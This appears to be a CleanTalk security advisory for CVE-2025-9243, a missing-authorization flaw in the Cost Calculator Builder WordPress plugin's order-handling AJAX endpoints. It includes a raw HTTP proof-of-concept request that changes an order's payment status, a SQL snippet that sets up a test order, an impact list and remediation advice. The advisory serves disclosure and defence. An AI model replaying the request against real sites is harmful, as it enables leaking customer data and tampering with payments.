Cost Calculator Builder (v3.5.24) is a popular WordPress plugin (50k+ installs) that enables site owners to create customizable pricing calculators and capture form-based orders. It exposes AJAX endpoints—get_cc_orders to list orders and update_order_status to change an order’s status—relying solely on client-side nonces injected into window.ccb_nonces. However, these handlers perform no current_user_can() checks, permitting any visitor who steals or observes the publicly exposed nonces to list all orders (including customer names and email addresses) and arbitrarily mark payments as complete, canceled, rejected, or pending.
| CVE | CVE-2025-9243 |
| Plugin Version | Cost Calculator Builder <= 3.5.32 |
| Critical | High |
| All Time | 2 701 355 |
| Active installations | 50 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9243 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cost-calculator-builder/cost-calculator-builder-3532-authenticated-subscriber-missing-authorization-via-get-cc-ordersupdate-order-status-functions |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| August 22, 2025 | Plugin testing and vulnerability detection in the Cost Calculator Builder have been completed |
| August 22, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 9, 2025 | Registered CVE-2025-9243 |
Discovery of the Vulnerability
A security review revealed that both AJAX actions are registered with add_action('wp_ajax_nopriv_...') and add_action('wp_ajax_...'), but their callbacks invoke only wp_verify_nonce( $_POST['nonce'], 'ccb_orders' ) or ccb_update_order without checking user capabilities. Since the plugin enqueues these nonces on public pages, any unauthenticated visitor can read window.ccb_nonces, extract the tokens, and invoke order-related actions via admin-ajax.php.
Understanding of CSRF attack’s
WordPress requires both nonce validation (to prevent CSRF) and capability checks (to enforce role-based access). Omitting capability checks while trusting nonces—especially when those nonces are publicly exposed—effectively grants low or no-privileged users administrator-level actions. This pattern has appeared in other plugins (CVE-2025-9202 in ColorMag, CVE-2025-11705 in Anti-Malware Security), leading to data leakage and business-logic manipulation. CVE-2025-9243 echoes these flaws: unprivileged users can now breach customer privacy and tamper with financial workflows.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-9243, an attacker with Subscriber+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/index.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 125 Origin: http://127.0.0.1 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Subscriber+ Cookies Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=update_order_status&nonce=NONCE_FROM_PROFILE.php&data=JTdiJTIyaWRzJTIyJTNhJTIyMiUyMiUyYyUyMnN0YXR1cyUyMiUzYSUyMmNvbXBsZXRlJTIyJTdk For tests you should create a order in DB: INSERT INTO wp_cc_orders (calc_id, calc_title, status, order_details, form_details, promocodes, created_at, updated_at) VALUES (2,'Test Calculator','pending', '[{"alias":"text_field_id_1","label":"Text","value":"Sample","options":null}]', '{"fields":[{"name":"name","value":"John Doe"},{"name":"email","value":"us**@*****le.com"}]}', '[]', NOW(), NOW()); select * from wp_cc_orders;____
Data Exposure: Attackers harvest customer names, emails, and order details—violating privacy and GDPR regulations.
Financial Fraud: Malicious actors can mark orders as “complete” to trigger fulfillment or “rejected” to block genuine purchases.
Business Disruption: Automated bots could toggle payment statuses unpredictably, leading to shipping errors, refunds, or lost revenue.
Integrity Loss: Order history becomes unreliable, preventing accurate reporting and reconciliation.
Recommendations for Improved Security
Capability Enforcement: In both AJAX handlers, add if ( ! current_user_can( 'manage_options' ) ) wp_send_json_error( 'Unauthorized' );.
Restrict Nonce Exposure: Only inject ccb_nonces on admin pages, not publicly.
Separate Nonces per Action: Use distinct, action-specific nonces and verify them via check_ajax_referer().
Audit AJAX Routes: Ensure all state-changing AJAX actions require both a valid nonce and appropriate capabilities.
Logging & Alerts: Record each action with user IP and timestamp, and alert site administrators on unexpected status changes.
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-9243 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.